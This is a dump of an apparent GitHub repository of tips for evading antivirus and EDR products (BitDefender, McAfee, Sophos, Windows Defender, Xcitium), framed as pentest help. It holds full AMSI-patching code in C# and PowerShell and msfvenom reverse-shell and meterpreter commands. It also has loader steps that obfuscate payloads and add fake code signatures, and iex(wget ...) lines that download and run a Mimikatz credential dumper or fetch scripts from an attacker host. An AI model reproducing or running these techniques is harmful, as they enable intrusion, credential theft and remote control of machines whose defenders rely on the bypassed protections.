[
  {
    "path": "BitDefender Endpoint Security Tool/README.md",
    "content": "# BitDefender\n\n## Using Condor + Powershell Empire\n\nThe [condor](https://github.com/MrEmpy/Condor) tool can also bypass BitDefender's EDR, including running Powershell Empire's own modules, such as Mimikatz, without interruption.\n\n1. Open your Powershell Empire and generate a Powershell payload, for example:\n\n```\npowershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACg...\n```\n\n2. Run the condor tool with the following command:\n\n```\npython3 condor.py -p windows/x64/exec\n```\n\n3. Paste the Powershell payload to generate the shellcode.\n\n![](<../BitDefender Endpoint Security Tool/Images/bitdefender2.png>)\n\n4. Upload the EXE to the target machine and run it.\n\n![](<../BitDefender Endpoint Security Tool/Images/bitdefender.png>)\n"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2022 MrEmpy\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "McAfee MVISION/README.md",
    "content": "# McAfee MVISION\n\n## Bypassing using ScareCrow\n\nYou can use the [scarecrow](https://github.com/optiv/ScareCrow) tool to bypass McAfee EDR. We tested three Metasploit payload types that work:\n\n* windows/x64/shell/reverse\\_tcp\n* windows/x64/meterpreter\\_reverse\\_https\n* windows/x64/exec\n\nCommands:\n\n```\n$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -a x64 -e x64/xor > shellcode.bin \n$ ./ScareCrow_4.11_linux_amd64 -I shellcode.bin -domain microsoft.com \n```\n\nScareCrow obfuscates the loader to evade protections and also adds a fake code signature so that the binary looks more credible on the target. ![](https://github.com/optiv/ScareCrow/raw/main/Screenshots/File\\_Attributes.png)\n"
  },
  {
    "path": "README.md",
    "content": "<h1 align=\"center\">「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips</h1>\n\n<p align=\"center\"><img src=\"shield.jpg\"></p>\n\nWelcome to this repository! The purpose of this repository is to gather as many techniques and tools as possible to circumvent AVs, EDRs and XDRs so that it can help you throughout your pentest.\n\nHelp our work by leaving a star in the repository ;)\n\n[Gitbook Here](https://mrempy.gitbook.io/awesome-av-edr-xdr-bypass-tips/readme/windows-defender)\n\n## AV/EDR/XDR Table\n\n| Name | Type | Operating System | XXX | XXX |\n| ----------- | ----------- | ----------- | ----------- | ----------- |\n| [BitDefender Endpoint Security Tool](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/BitDefender%20Endpoint%20Security%20Tool) | EDR | Windows | XXX | XXX |\n| [McAfee Endpoint Protection](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/McAfee%20MVISION) | EDR | Windows | XXX | XXX |\n| [Sophos](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Sophos) | EDR | Windows | XXX | XXX |\n| [Windows Defender](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Windows%20Defender) | Antivirus | Windows | XXX | XXX |\n| [Xcitium Client Security](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Xcitium%20Client%20Security) | Antivirus | Windows | XXX | XXX |\n"
  },
  {
    "path": "Sophos/README.md",
    "content": "# Sophos\n\n## Bypassing Sophos Endpoint Protection With Hoaxshell\n\nDownload hoaxshell from GitHub:\n\n```\ngit clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\n```\n\nCommand:\n\n```\npython3 hoaxshell.py -s SERVER_IP\n```\n\nNow copy the payload generated by hoaxshell, open cmd on the victim machine and paste the payload.\n\n![](../Sophos/Images/sophoshs.png)\n\n## Execution\n\n![](../Sophos/Images/sophoshs1.png)\n"
  },
  {
    "path": "Windows Defender/README.md",
    "content": "# Windows Defender\n\n## AMSI Bypass\n\nIf you need to run some Powershell command that is being blocked by AMSI, try running this command to get around it:\n\n![](<../Windows Defender/Images/amsi\\_bypass3.png>) https://gist.githubusercontent.com/FatRodzianko/c8a76537b5a87b850c7d158728717998/raw/36103d12eec662d532c9127f2396bc347d13c3c5/my-am-bypass.ps1\n\nYou can base64-encode the command so that it is a single line. Use CyberChef to encode the code to base64.\n\n![](<../Windows Defender/Images/amsi\\_bypass2.png>) CyberChef URL:\n\nhttps://icyberchef.com/#recipe=To\\_Base64('A-Za-z0-9%2B/%3D')\\&input=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\n\nCommand:\n\n```\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"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\")) | IEX\n```\n\n### Execution\n\n![](<../Windows Defender/Images/amsi\\_bypass1.png>)\n\n## Defeating Windows Defender & Bypassing Amsi And Running Mimikatz\n\n### Execution\n\n![](<../Windows Defender/Images/wd+amsi\\_bypass\\_mimikatz.png>)\n\nCommand:\n\n```\niex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n```\n\n## AMSI Bypass Using Hardware Breakpoints (by [EthicalChaos](https://twitter.com/_EthicalChaos))\n\n```\n$HardwareBreakpoint = @\"\n// Technique from @_EthicalChaos_ (https://twitter.com/_EthicalChaos_)\n// Original Code by @d_tranman: https://twitter.com/d_tranman/status/1628954053115002881\n// Slight modifications by @ShitSecure for Powershell runtime compatibility as the original code could not be used like this. Also the removal of the Hardware breakpoint was removed, so that every following future Powershell command bypasses AMSI as well.\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq.Expressions;\nusing System.Linq;\nusing System.Runtime.CompilerServices;\nusing System.Net;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\n\nnamespace Test\n{\n    // CCOB IS THE GOAT\n   \n    public class Program\n    {\n        static string a = \"msi\";\n        static string b = \"anB\";\n        static string c = \"ff\";\n        static IntPtr BaseAddress = WinAPI.LoadLibrary(\"a\" + a + \".dll\");\n        static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, \"A\" + a + \"Sc\" + b + \"u\" + c + \"er\");\n        static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));\n        \n        public static void SetupBypass()\n        {\n\n            WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();\n            ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;\n\n            MethodInfo method = typeof(Program).GetMethod(\"Handler\", BindingFlags.Static | BindingFlags.Public);\n            IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());\n            \n            // Saving our context to a struct\n            Marshal.StructureToPtr(ctx, pCtx, true);\n            bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);\n            ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));\n\n            EnableBreakpoint(ctx, pABuF, 0);\n\n            WinAPI.SetThreadContext((IntPtr)(-2), pCtx);\n\n        }\n        \n        public static long Handler(IntPtr exceptions)\n        {\n            WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();\n            ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));\n\n            WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();\n            ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));\n\n            WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();\n            ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));\n\n            if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)\n            {\n                ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);\n\n                // THE OUTPUT AMSIRESULT IS A POINTER, NOT THE EXPLICIT VALUE AAAAAAAAAA\n                IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean\n                //Console.WriteLine(\"Buffer: 0x{0:X}\", (long)ContextRecord.R8);\n                //Console.WriteLine(\"Scan Result: 0x{0:X}\", Marshal.ReadInt32(ScanResult));\n\n                Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);\n\n                ContextRecord.Rip = ReturnAddress;\n                ContextRecord.Rsp += 8;\n                ContextRecord.Rax = 0; // S_OK\n                \n                Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT\n                return WinAPI.EXCEPTION_CONTINUE_EXECUTION;\n            }\n            else\n            {\n                return WinAPI.EXCEPTION_CONTINUE_SEARCH;\n            }\n\n        }\n        public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)\n        {\n\n            switch (index)\n            {\n                case 0:\n                    ctx.Dr0 = (ulong)address.ToInt64();\n                    break;\n                case 1:\n                    ctx.Dr1 = (ulong)address.ToInt64();\n                    break;\n                case 2:\n                    ctx.Dr2 = (ulong)address.ToInt64();\n                    break;\n                case 3:\n                    ctx.Dr3 = (ulong)address.ToInt64();\n                    break;\n            }\n\n            //Set bits 16-31 as 0, which sets\n            //DR0-DR3 HBP's for execute HBP\n            ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);\n\n            //Set DRx HBP as enabled for local mode\n            ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);\n            ctx.Dr6 = 0;\n\n            // Now copy the changed ctx into the original struct\n            Marshal.StructureToPtr(ctx, pCtx, true);\n        }\n        public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)\n        {\n            ulong mask = (1UL << bits) - 1UL;\n            dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);\n            return dw;\n        }\n    }\n    public class WinAPI\n    {\n        public const UInt32 DBG_CONTINUE = 0x00010002;\n        public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;\n        public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;\n        public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;\n        public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;\n        public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;\n        public const Int32 EXCEPTION_DEBUG_EVENT = 1;\n        public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;\n        public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;\n        public const Int32 LOAD_DLL_DEBUG_EVENT = 6;\n        public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;\n        public const Int32 RIP_EVENT = 9;\n        public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;\n\n        public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;\n        public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;\n        public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;\n        public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;\n        public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;\n        public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;\n        public const UInt32 DBG_CONTROL_C = 0x40010006;\n        public const UInt32 DEBUG_PROCESS = 0x00000001;\n        public const UInt32 CREATE_SUSPENDED = 0x00000004;\n        public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;\n\n        public const Int32 AMSI_RESULT_CLEAN = 0;\n\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n        [DllImport(\"kernel32\", SetLastError = true, CharSet = CharSet.Ansi)]\n        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);\n\n        [DllImport(\"Kernel32.dll\")]\n        public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);\n        [Flags]\n        public enum CONTEXT64_FLAGS : uint\n        {\n            CONTEXT64_AMD64 = 0x100000,\n            CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,\n            CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,\n            CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,\n            CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,\n            CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,\n            CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,\n            CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct M128A\n        {\n            public ulong High;\n            public long Low;\n\n            public override string ToString()\n            {\n                return string.Format(\"High:{0}, Low:{1}\", this.High, this.Low);\n            }\n        }\n\n        /// <summary>\n        /// x64\n        /// </summary>\n        [StructLayout(LayoutKind.Sequential, Pack = 16)]\n        public struct XSAVE_FORMAT64\n        {\n            public ushort ControlWord;\n            public ushort StatusWord;\n            public byte TagWord;\n            public byte Reserved1;\n            public ushort ErrorOpcode;\n            public uint ErrorOffset;\n            public ushort ErrorSelector;\n            public ushort Reserved2;\n            public uint DataOffset;\n            public ushort DataSelector;\n            public ushort Reserved3;\n            public uint MxCsr;\n            public uint MxCsr_Mask;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]\n            public M128A[] FloatRegisters;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]\n            public M128A[] XmmRegisters;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]\n            public byte[] Reserved4;\n        }\n\n        /// <summary>\n        /// x64\n        /// </summary>\n        [StructLayout(LayoutKind.Sequential, Pack = 16)]\n        public struct CONTEXT64\n        {\n            public ulong P1Home;\n            public ulong P2Home;\n            public ulong P3Home;\n            public ulong P4Home;\n            public ulong P5Home;\n            public ulong P6Home;\n\n            public CONTEXT64_FLAGS ContextFlags;\n            public uint MxCsr;\n\n            public ushort SegCs;\n            public ushort SegDs;\n            public ushort SegEs;\n            public ushort SegFs;\n            public ushort SegGs;\n            public ushort SegSs;\n            public uint EFlags;\n\n            public ulong Dr0;\n            public ulong Dr1;\n            public ulong Dr2;\n            public ulong Dr3;\n            public ulong Dr6;\n            public ulong Dr7;\n\n            public ulong Rax;\n            public ulong Rcx;\n            public ulong Rdx;\n            public ulong Rbx;\n            public ulong Rsp;\n            public ulong Rbp;\n            public ulong Rsi;\n            public ulong Rdi;\n            public ulong R8;\n            public ulong R9;\n            public ulong R10;\n            public ulong R11;\n            public ulong R12;\n            public ulong R13;\n            public ulong R14;\n            public ulong R15;\n            public ulong Rip;\n\n            public XSAVE_FORMAT64 DUMMYUNIONNAME;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]\n            public M128A[] VectorRegister;\n            public ulong VectorControl;\n\n            public ulong DebugControl;\n            public ulong LastBranchToRip;\n            public ulong LastBranchFromRip;\n            public ulong LastExceptionToRip;\n            public ulong LastExceptionFromRip;\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct EXCEPTION_RECORD\n        {\n            public uint ExceptionCode;\n            public uint ExceptionFlags;\n            public IntPtr ExceptionRecord;\n            public IntPtr ExceptionAddress;\n            public uint NumberParameters;\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct EXCEPTION_POINTERS\n        {\n            public IntPtr pExceptionRecord;\n            public IntPtr pContextRecord;\n        }\n    }\n}\n\n\n\"@\n\nAdd-Type -TypeDefinition $HardwareBreakpoint\n\n[Test.Program]::SetupBypass()\n```\n\n## AMSI Bypass (by [am0nsec](https://twitter.com/am0nsec))\n\n```\nWrite-Host \"-- AMSI Patch\"\nWrite-Host \"-- Paul Laîné (@am0nsec)\"\nWrite-Host \"\"\n\n$Kernel32 = @\"\nusing System;\nusing System.Runtime.InteropServices;\n\npublic class Kernel32 {\n    [DllImport(\"kernel32\")]\n    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);\n\n    [DllImport(\"kernel32\")]\n    public static extern IntPtr LoadLibrary(string lpLibFileName);\n\n    [DllImport(\"kernel32\")]\n    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);\n}\n\"@\n\nAdd-Type $Kernel32\n\nClass Hunter {\n    static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {\n        while ($true) {\n            [int]$count = 0\n\n            while ($true) {\n                [IntPtr]$address = [IntPtr]::Add($address, 1)\n                If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {\n                    $count++\n                    If ($count -eq $egg.Length) {\n                        return [IntPtr]::Subtract($address, $egg.Length - 1)\n                    }\n                } Else { break }\n            }\n        }\n\n        return $address\n    }\n}\n\n[IntPtr]$hModule = [Kernel32]::LoadLibrary(\"amsi.dll\")\nWrite-Host \"[+] AMSI DLL Handle: $hModule\"\n\n[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, \"DllCanUnloadNow\")\nWrite-Host \"[+] DllCanUnloadNow address: $dllCanUnloadNowAddress\"\n\nIf ([IntPtr]::Size -eq 8) {\n\tWrite-Host \"[+] 64-bits process\"\n    [byte[]]$egg = [byte[]] (\n        0x4C, 0x8B, 0xDC,       # mov     r11,rsp\n        0x49, 0x89, 0x5B, 0x08, # mov     qword ptr [r11+8],rbx\n        0x49, 0x89, 0x6B, 0x10, # mov     qword ptr [r11+10h],rbp\n        0x49, 0x89, 0x73, 0x18, # mov     qword ptr [r11+18h],rsi\n        0x57,                   # push    rdi\n        0x41, 0x56,             # push    r14\n        0x41, 0x57,             # push    r15\n        0x48, 0x83, 0xEC, 0x70  # sub     rsp,70h\n    )\n} Else {\n\tWrite-Host \"[+] 32-bits process\"\n    [byte[]]$egg = [byte[]] (\n        0x8B, 0xFF,             # mov     edi,edi\n        0x55,                   # push    ebp\n        0x8B, 0xEC,             # mov     ebp,esp\n        0x83, 0xEC, 0x18,       # sub     esp,18h\n        0x53,                   # push    ebx\n        0x56                    # push    esi\n    )\n}\n[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)\nWrite-Host \"[+] Targeted address: $targetedAddress\"\n\n$oldProtectionBuffer = 0\n[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null\n\n$patch = [byte[]] (\n    0x31, 0xC0,    # xor rax, rax\n    0xC3           # ret  \n)\n[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)\n\n$a = 0\n[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null\n```\n\n## Using condor tool + AMSI bypass + Covenant C2\n\nThe [condor](https://github.com/MrEmpy/Condor) tool is used for evasion of protections like AVs/EDRs/XDRs. You can use it to combine an AMSI bypass with a C2 like Covenant.\n\n1. On the attacker's machine, create a folder containing two powershell scripts, one to bypass AMSI and another for the target to connect to the C2.\n\nbypass.ps1\n\n```\n# TLDR:\n# iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n#\n# @author Pichaya Morimoto (p.morimoto@sth.sh)\n# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition\n# (Tested and worked on Windows 10 x64 patched 2022-03-26)\n#\n# Usage:\n# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)\n# 2. iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n# or\n# iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n#\n# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)\n# https://payatu.com/blog/arun.nair/amsi-bypass\n$code = @\"\nusing System;\nusing System.Runtime.InteropServices;\npublic class WinApi {\n\n        [DllImport(\"kernel32\")]\n        public static extern IntPtr LoadLibrary(string name);\n\n        [DllImport(\"kernel32\")]\n        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n\n        [DllImport(\"kernel32\")]\n        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out int lpflOldProtect);\n\n}\n\"@\n\nAdd-Type $code\n\n$amsiDll = [WinApi]::LoadLibrary(\"amsi.dll\")\n$asbAddr = [WinApi]::GetProcAddress($amsiDll, \"Ams\"+\"iScan\"+\"Buf\"+\"fer\")\n$ret = [Byte[]] ( 0xc3, 0x80, 0x07, 0x00,0x57, 0xb8 )\n$out = 0\n\n[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out)\n[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length)\n[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, $out, [ref] $null)\n\n\n# nishang - 2.2.0 (Jul 24, 2021)\n# Change this to \"attacker-local-ip\" for internal sources\n\niex(wget http://attacker.com/exec.ps1 -UseBasicParsing)\n```\n\n[Reference](https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093)\n\nOn the last line, where the `wget` command is, put the IP of the attacker's machine that hosts the two files (bypass.ps1 and exec.ps1).\n\n2. Go to Covenant and generate a powershell payload.\n\n![](<../Windows Defender/Images/genpscovenant1.png>)\n\n![](<../Windows Defender/Images/genpscovenant2.png>)\n\nThe payload will look like this:\n\nexec.ps1\n\n```\nsv o (New-Object IO.MemoryStream);sv d (New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('7Vp7cFzle...\n```\n\n3. Now create a file called exec.ps1 and paste the modified payload.\n4. Open an HTTP port so the target can connect to it and run bypass.ps1.\n\n![](<../Windows Defender/Images/httpopencovenant.png>)\n\n5. Run the following command using the condor tool:\n\n```\npython3 condor.py -p windows/x64/exec\n```\n\n6. Paste the following command:\n\n```\npowershell -Sta -Nop -Window Hidden -Command \"iex(wget http://attacker.com/bypass.ps1 -UseBasicParsing)\"\n```\n\nReplace \"attacker.com\" with the IP of the attacker's machine.\n\n7. After generating the EXE, run it on the target machine.\n\n![](<../Windows Defender/Images/covenantpoc1.png>)\n\n![](<../Windows Defender/Images/covenantpoc2.png>)\n"
  },
  {
    "path": "Xcitium Client Security/README.md",
    "content": "# Xcitium Client Security\r\n\r\n## AMSI Bypass\r\n\r\nIf you need to run some Powershell command that is being blocked by AMSI, try running this command to get around it:\r\n\r\n![](<../Windows Defender/Images/amsi\\_bypass3.png>) https://gist.githubusercontent.com/FatRodzianko/c8a76537b5a87b850c7d158728717998/raw/36103d12eec662d532c9127f2396bc347d13c3c5/my-am-bypass.ps1\r\n\r\nYou can base64-encode the command so that it is a single line. Use CyberChef to encode the code to base64.\r\n\r\n![](<../Windows Defender/Images/amsi\\_bypass2.png>) CyberChef URL:\r\n\r\nhttps://icyberchef.com/#recipe=To\\_Base64('A-Za-z0-9%2B/%3D')\\&input=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\r\n\r\nCommand:\r\n\r\n```\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"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\")) | IEX\r\n```\r\n\r\n### Execution\r\n\r\n![](<../Xcitium Client Security/Images/amsi-bypass.png>)\r\n\r\n## Metasploit payload based on Powershell script\r\n\r\nXcitium Client Security does not monitor commands executed in cmd and Powershell; because of this lack of monitoring it is possible to run a Powershell-based payload without any obfuscation. The only \"problem\" is AMSI, which can be easily bypassed.\r\n\r\nOn the attacker's machine, create the payload using the command:\r\n\r\n```\r\nmsfvenom -p windows/x64/meterpreter/reverse_http LHOST=<HOST> LPORT=<PORT> -f psh-reflection\r\n```\r\n\r\n![](<../Xcitium Client Security/Images/msfv-pl-gen.png>)\r\n\r\nOn the target server, bypass AMSI using the [command](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Xcitium%20Client%20Security#xcitium-client-security) shown above and then copy and paste the payload into Powershell.\r\n\r\n### Execution\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-msfv.png>)\r\n\r\nNote: in the screenshot I encoded the payload in Base64 so that it fits on one line.\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-success1.png>)\r\n\r\n![](<../Xcitium Client Security/Images/ps-pl-success2.png>)\r\n\r\n## Running Mimikatz via Powershell\r\n\r\nAs discussed above, Client Security does not monitor command execution via Powershell, so a simple command that loads Mimikatz via Powershell is enough.\r\n\r\nCommand:\r\n\r\n```\r\niex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\r\n```\r\n\r\n![](<../Xcitium Client Security/Images/mimikatz-bypass1.png>)\r\n\r\n![](<../Xcitium Client Security/Images/mimikatz-bypass.png>)\r\n"
  }
]